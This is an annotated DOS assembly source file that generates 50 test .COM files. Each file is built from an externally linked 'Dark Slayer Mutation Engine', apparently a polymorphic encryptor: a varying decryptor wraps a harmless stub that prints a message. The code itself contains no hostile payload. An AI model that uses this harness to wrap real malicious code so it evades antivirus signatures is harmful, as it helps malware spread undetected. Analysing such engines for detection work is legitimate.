; Dark Slayer Mutation Engine v1.0
; Written by Dark Slayer in Taiwan
;
; DSME_GEN - test-file generator for the DSME engine (MASM syntax, DOS .COM,
; 16-bit real mode).  The engine itself is NOT in this file: it is linked in
; through the EXTRN below.  This program writes 50 small .COM files to the
; current directory, each consisting of a DSME-produced decryptor followed by
; the encrypted PROC_START..PROC_END stub (which only prints MSG and exits).
; The plaintext is identical in every file; presumably only the decryptor
; differs between them (DSME is not on this page - confirm against it).

DSME_GEN SEGMENT
ASSUME CS:DSME_GEN,DS:DSME_GEN          ; single-segment image: CS and DS name the same segment
ORG 0100h                               ; .COM program: code starts after the 256-byte PSP

; Delta between MSG and the return address pushed by the CALL $+0003h in
; PROC_START: MOV AH,09h (2 bytes) + near CALL (3 bytes) = 5 bytes, so
; (PROC_START+5) + MSG_ADDR == MSG whatever address the stub is running at.
MSG_ADDR EQU OFFSET MSG-OFFSET PROC_START-0005h

; DSME     = engine entry point (called once per generated file in START)
; DSME_END = end of the linked-in engine image; START uses it to find the
;            first free paragraph after this program
EXTRN DSME:NEAR,DSME_END:NEAR

; (The original Chinese remark on this line was mis-encoded in this copy;
;  the author's English version follows.)
; you may get some information as following remarks
;
;-----------------------------------------------------------------------
; START - generator entry point (DOS .COM, 16-bit real mode)
; Flow:   print the banner, compute a free segment just past the loaded
;         image, then 50 times: create 000000NN.COM, run DSME over
;         PROC_START..PROC_END, write DSME's output buffer to the file,
;         close it, advance NN.
; DSME contract as used here (see the author's remarks inline):
;         ES    = scratch segment for decryptor + encrypted code
;         BP    = offset the decryptor will execute at in the target
;         CX    = length of the code to encrypt
;         DS:DX = code to encrypt
;         BL    = 00h (COM mode)
;         returns DS:DX = generated buffer, CX = its length
; Uses:   AX, BX, CX, DX, BP, ES, DS (DS is restored from CS after each call)
;-----------------------------------------------------------------------
START:
        MOV AH,09h                      ; DOS: print '$'-terminated string
        MOV DX,OFFSET DG_MSG
        INT 21h

        ; ES = first paragraph past this program + the linked-in DSME image.
        ; OFFSET DSME_END already includes the 0100h PSP (ORG 0100h), so it is
        ; "this program + DSME" counted from the PSP; +000Fh rounds the byte
        ; count up to whole 16-byte paragraphs before the SHR by 4 turns it
        ; into a paragraph count that is added to CS.
        MOV AX,OFFSET DSME_END+000Fh
        MOV CL,04h
        SHR AX,CL                       ; count-in-CL form; the immediate SHR AX,4 needs a 186+
        MOV BX,CS
        ADD BX,AX
        ; Setting ES to put decryptor and encrypted code.
        ; Decryptor maximum is 1024 bytes.
        ; You should notice the allocation of memory size when you use DSME
        ; in resident mode.
        ; NOTE(review): nothing here allocates that memory from DOS; this
        ; presumably relies on a .COM owning the rest of its 64K segment.
        MOV ES,BX

        MOV CX,50                       ; number of test files to generate
DG_L0:
        PUSH CX                         ; loop counter; CX is reused below
        MOV AH,3Ch                      ; DOS: create/truncate file
        XOR CX,CX                       ; attributes = normal
        MOV DX,OFFSET FILE_NAME         ; DS:DX -> ASCIIZ "000000NN.COM"
        INT 21h
        ; NOTE(review): CF is not tested.  If the create fails AX holds a DOS
        ; error code, which then becomes the "handle" in BX below.
        XCHG BX,AX                      ; BX = file handle

        MOV BP,0100h                    ; Offset where the decryption routine will be
                                        ; executed.  It depends on which kind of file:
                                        ; COM or EXE?  (0100h = .COM entry offset)
        MOV CX,OFFSET PROC_END-OFFSET PROC_START ; CX = length of the code to encrypt
        MOV DX,OFFSET PROC_START        ; DS:DX -> code to encrypt
        PUSH BX                         ; keep File handle (BL is overwritten next)
        MOV BL,00h                      ; COM mode
        CALL DSME
        POP BX                          ; file handle again
        ; When returning from DSME, DS:DX = decryptor + encrypted code's
        ; address and CX = length of decryptor + encrypted code.  Other
        ; registers won't be changed.
        ; NOTE(review): the PUSH CS / POP DS after the write suggests DS comes
        ; back pointing into the ES buffer segment rather than CS - confirm
        ; against DSME.
        MOV AH,40h                      ; DOS: write CX bytes from DS:DX to handle BX
        INT 21h                         ; NOTE(review): CF and AX (bytes written) are not checked
        MOV AH,3Eh                      ; DOS: close handle BX
        INT 21h
        PUSH CS
        POP DS                          ; restore DS

        ; Advance the two-digit decimal counter "NN" in FILE_NUM ('00'..'49').
        MOV BX,OFFSET FILE_NUM
        INC BYTE PTR DS:[BX+0001h]      ; ones digit
        CMP BYTE PTR DS:[BX+0001h],'9'
        JBE DG_L1                       ; still a digit -> done
        INC BYTE PTR DS:[BX]            ; carry into the tens digit
        MOV BYTE PTR DS:[BX+0001h],'0'
DG_L1:
        POP CX
        LOOP DG_L0                      ; CX = files still to generate
        MOV AH,4Ch                      ; DOS: terminate; AL (exit code) is not set explicitly,
        INT 21h                         ; so it is whatever the last INT 21h left there
; Output file name as one ASCIIZ string: FILE_NAME and FILE_NUM are
; contiguous, giving "00000000.COM",0.  The first two bytes of FILE_NUM are
; the decimal counter that DG_L1 in START advances after every file.
FILE_NAME DB '000000'
FILE_NUM DB '00.COM',00h

; Banner printed by START via INT 21h / AH=09h ('$' terminator).
DG_MSG DB 'Generates 50 DSME encrypted test files.',0Dh,0Ah,'$'
;-----------------------------------------------------------------------
; PROC_START..PROC_END - the stub that DSME encrypts and that every
; generated .COM runs after its decryptor: print MSG, then exit.
; It must be position-independent: the stub sits behind a decryptor whose
; length varies (up to 1024 bytes per the remark in START), so its run-time
; address is not known here.  CALL $+0003h pushes the address of the
; following POP DX (PROC_START+5), and MSG_ADDR (= MSG - PROC_START - 5)
; turns that into the run-time address of MSG.
;-----------------------------------------------------------------------
PROC_START:
        MOV AH,09h                      ; DOS: print '$'-terminated string
        CALL $+0003h                    ; pushes the address of the next instruction
        POP DX                          ; DX = own address (PROC_START+5 at run time)
        ADD DX,MSG_ADDR                 ; DX -> MSG wherever the stub was loaded
        INT 21h
        INT 20h                         ; DOS: terminate program (.COM style)
MSG DB 'this is <DSME> test file.$'
PROC_END:

DSME_GEN ENDS
END START                               ; entry point of the generator itself